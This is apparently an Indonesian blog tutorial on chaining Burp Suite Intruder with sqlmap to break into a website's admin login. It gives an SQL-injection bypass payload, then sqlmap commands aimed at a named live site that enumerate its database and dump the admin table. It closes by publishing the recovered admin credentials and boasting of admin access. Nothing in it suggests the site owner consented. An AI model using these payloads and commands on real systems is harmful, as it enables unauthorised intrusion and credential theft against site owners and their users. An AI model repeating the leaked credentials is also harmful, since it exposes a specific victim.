Welcome back dude.
January is my special month, especialy today. I'm happy =))

Oke, langsung ke pembahasan. Saya akan membagikan sedikit tambahan tentang kombinasi antara kemanfaatan dua tool yang kadang saya gunakan untuk mendapatkan target saya.

  • Burpsuite
  • Sqlmap

Disini adalah kebingungan ketika kita mencari letak vulnerable parameter yang dikirimkan ke server karena si victim menggunakan basis data html. Maka step pertama yang saya lakukan adalah mencari tempat login si admin.
Oke, saya anggap kamu sudah mengetahui tempat loginnya.

Setting dulu kedua alat tadi, seperti ini.

Firefox -> Edit -> Preferences -> Advanced -> Network -> Setting -> Pilih Manual Proxy Configuration. Set HTTP PROXY dengan 0.0.0.0 dan PORT 8080

Burpsuite -> Tab Proxy -> Intercept -> Intercept is off


Login, agar burpsuite mencatat http request yang dikirim ke server dari website target



Treng!! username or password is incorrect, hahaha. Tidak apa-apa karena burpsuite sudah mencatat datanya.



Block tulisan seperti diatas, lalu tekan CTRL+ I
Pergi ke Intruder, kamu akan melihat catatan data tadi.
Kemudian Setting tab Position dan Payloads seperti gambar dibawah




Block data yang dikirim oleh parameter username dan password saja




Set payload type menjadi Runtime file dan load file bypass sql injection injection kamu.
Jika sudah klik menu Intruder -> Start attack


Respon 200 dan 302 disini hampir sama-sama memberikan hasil yang positif walaupun tidak semua, periksa lagi jika kamu melakukannya pada lain target.

Saya ambil seperti hasil scan diatas, dan mencoba login kembali

Username : ' or 1=1 limit 1 -- -+
Password  : ' or 1=1 limit 1 -- -+


Hasil dari login menunjukkan bahwa target mempunyai celah sql injection



Sampai disini kamu telah mengetahui letak yang bisa di inject. Step selanjutnya mari gunakan sqlmap
Kembali ke http respond, kita copy data yang dikirim ke server tadi

  • username=admin&password=admin&Input=Submit

sqlmap -u "http://eassenugu.com/rear/proccess_login.php" --data "username=admin&password=admin&Input=Submit" -p username --dbms mysql --dbs


Snip.. Snipp..

Saat mencari isi database, tables, columns tidak saya gambarkan disini, karena terlalu panjang

DB : digitav2_easse
Tables : setup
Columns : username,password

sqlmap -u "http://eassenugu.com/rear/proccess_login.php" --data "username=admin&password=admin&Input=Submit" -p username --dbms mysql -D digitav2_easse -T setup -C username,password --dump

username : admin, password : website. Untuk membuktikannya coba login kembali


Yeah, you now admin !!



Thanks : R-N for today =))